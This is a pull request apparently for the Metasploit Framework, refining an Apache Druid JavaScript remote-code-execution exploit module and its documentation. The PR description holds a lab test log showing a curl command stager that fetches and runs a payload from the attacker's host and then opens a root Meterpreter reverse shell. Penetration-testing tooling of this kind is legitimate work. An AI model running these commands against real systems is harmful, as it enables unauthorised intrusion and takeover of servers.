### PR TITLE
Apache Druid module changes

### DIFF
--- a/documentation/modules/exploit/linux/http/apache_druid_js_rce.md
+++ b/documentation/modules/exploit/linux/http/apache_druid_js_rce.md
@@ -6,7 +6,7 @@ Apache Druid versions prior to `v0.20.1`
 
 Apache Druid includes the ability to execute user-provided JavaScript code embedded in
 various types of requests; however, that feature is disabled by default.
-          
+
 In Druid versions prior to `0.20.1`, an authenticated user can send a specially-crafted request
 that both enables the JavaScript code-execution feature and executes the supplied code all
 at once, allowing for code execution on the server with the privileges of the Druid Server process.
@@ -15,7 +15,6 @@ More critically, authentication is not enabled in Apache Druid by default.
 The issue has been fixed in Apache Druid `v0.20.1`
 
 This module has been tested successfully against the following versions:
-
 
 Apache Druid 0.15.1 Debian 9.11 (Linux 3.10.0-957.21.3.el7.x86_64)
 
@@ -41,6 +40,7 @@ To setup and run:
 `docker run --rm -i -p 8888:8888 fokkodriesprong/docker-druid`
 
 For a manual setup:
+
 * Download a vulnerable version of Apache Druid from [here](https://archive.apache.org/dist/druid/)
 * Extract the downloaded archive
 * Ensure a supported version of Java is installed on the system
@@ -49,13 +49,13 @@ For a manual setup:
 ## Verification Steps
 
 1. Install the application
-1. Start msfconsole
-1. Do: `use exploit/linux/http/apache_druid_js_rce`
-1. Do: `set rhosts <ip>`
-1. Do: `set lhost <ip>`
-1. Do: `set lport/srvport <ip>` if necessary
-1. Do: `run`
-1. You should get a shell.
+2. Start msfconsole
+3. Do: `use exploit/linux/http/apache_druid_js_rce`
+4. Do: `set rhosts <ip>`
+5. Do: `set lhost <ip>`
+6. Do: `set lport/srvport <ip>` if necessary
+7. Do: `run`
+8. You should get a shell.
 
 ## Targets
 
@@ -69,11 +69,9 @@ This executes a Unix command.
 
 ## Options
 
-### CHECKCMD
+### TARGETURI
 
-You can set a customize command to check and get command exec result respond.
-Default is "id"
-
+The base path to the Apache Druid application. This is set to `/` by default.
 
 ## Scenarios
 

--- a/modules/exploits/linux/http/apache_druid_js_rce.rb
+++ b/modules/exploits/linux/http/apache_druid_js_rce.rb
@@ -6,6 +6,7 @@
 class MetasploitModule < Msf::Exploit::Remote
   Rank = ExcellentRanking
 
+  prepend Msf::Exploit::Remote::AutoCheck
   include Msf::Exploit::Remote::HttpClient
   include Msf::Exploit::CmdStager
 
@@ -36,7 +37,7 @@ class MetasploitModule < Msf::Exploit::Remote
         },
         'Author' => [
           'Litch1, Security Team of Alibaba Cloud', # Vulnerability discovery
-          'je5442804', # Metasploit module
+          'je5442804' # Metasploit module
         ],
         'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],
         'References' => [
@@ -47,7 +48,7 @@ class MetasploitModule < Msf::Exploit::Remote
         ],
         'DisclosureDate' => '2021-01-21',
         'License' => MSF_LICENSE,
-        'Platform' => [ 'unix', 'linux' ],
+        'Platform' => ['unix', 'linux'],
         'Targets' => [
           [
             'Linux (dropper)', {
@@ -78,7 +79,8 @@ class MetasploitModule < Msf::Exploit::Remote
     )
 
     register_options([
-      Opt::RPORT(8888)
+      Opt::RPORT(8888),
+      OptString.new('TARGETURI', [true, 'The base path of Apache Druid', '/'])
     ])
   end
 
@@ -117,13 +119,13 @@ class MetasploitModule < Msf::Exploit::Remote
         numRows: 10
       }
     }.to_json
+
     send_request_cgi({
       'method' => 'POST',
-      'uri' => '/druid/indexer/v1/sampler',
+      'uri' => normalize_uri(target_uri.path, '/druid/indexer/v1/sampler'),
       'ctype' => 'application/json',
       'headers' => {
-        'Accept' => 'application/json, text/plain, */*',
-        'Accept-Language' => 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2'
+        'Accept' => 'application/json, text/plain, */*'
       },
       'data' => post_data
     })
@@ -131,20 +133,22 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def check
     genecho = Rex::Text.rand_text_alphanumeric(16..32).gsub(/A/, 'a')
+
+    vprint_status("Attempting to execute 'echo #{genecho}' on the target.")
     res = execute_command("echo #{genecho}")
     unless res
       return CheckCode::Unknown('Connection failed.')
     end
 
-    vprint_status(res.body)
     unless res.code == 200
       return CheckCode::Safe
     end
+
     if res.body.include?(genecho)
       return CheckCode::Vulnerable
     end
 
-    CheckCode::Unknown('Target does not seem to be running Apache Druid')
+    CheckCode::Unknown('Target does not seem to be running Apache Druid.')
   end
 
   def exploit


### PR DESCRIPTION
Hi, sorry, but I missed a few minor things in my review, so I went ahead and made them real quick. All this does is add the usage of `AutoCheck`, which automatically runs the `check()` method when a user uses this module. I also added usage of the `TARGETURI` option in case a user needs to configure the path to the target application. This also removes the `CheckCmd` from the module documentation.

I tested the changes, and here's my output:

```
msf6 > use exploit/linux/http/apache_druid_js_rce 
[*] Using configured payload linux/x64/meterpreter/reverse_tcp
msf6 exploit(linux/http/apache_druid_js_rce) > set rhost 192.168.37.133
rhost => 192.168.37.133
msf6 exploit(linux/http/apache_druid_js_rce) > set lhost 192.168.37.1
lhost => 192.168.37.1
msf6 exploit(linux/http/apache_druid_js_rce) > set verbose true
verbose => true
msf6 exploit(linux/http/apache_druid_js_rce) > run

[*] Started reverse TCP handler on 192.168.37.1:4444 
[*] Executing automatic check (disable AutoCheck to override)
[*] Attempting to execute 'echo epCaMmOPeEtKP1MFGlBI9nUmLWDcr' on the target.
[*] cmd= /bin/sh`@~-c`@~echo epCaMmOPeEtKP1MFGlBI9nUmLWDcr   var=bZXYXDdhuvdQ   name=YfxSdCqCYUr
[+] The target is vulnerable.
[*] Using URL: http://0.0.0.0:8080/MA3mCi
[*] Local IP: http://192.168.1.141:8080/MA3mCi
[*] Generated command stager: ["curl -so /tmp/OXsAqhOq http://192.168.37.1:8080/MA3mCi;chmod +x /tmp/OXsAqhOq;/tmp/OXsAqhOq;rm -f /tmp/OXsAqhOq"]
[*] cmd= /bin/sh`@~-c`@~curl -so /tmp/OXsAqhOq http://192.168.37.1:8080/MA3mCi;chmod +x /tmp/OXsAqhOq;/tmp/OXsAqhOq;rm -f /tmp/OXsAqhOq   var=hWxThSvVSVo   name=yZJpJBRp
[*] Client 192.168.37.133 (curl/7.68.0) requested /MA3mCi
[*] Sending payload to 192.168.37.133 (curl/7.68.0)
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3012516 bytes) to 192.168.37.133
[*] Meterpreter session 1 opened (192.168.37.1:4444 -> 192.168.37.133:38024) at 2021-04-09 12:17:36 -0500
[*] Command Stager progress - 100.00% done (111/111 bytes)
[*] Server stopped.

meterpreter > getuid
Server username: root @ ubuntu (uid=0, gid=0, euid=0, egid=0)
meterpreter > sysinfo
Computer     : 192.168.37.133
OS           : Ubuntu 20.04 (Linux 5.8.0-48-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter >
```
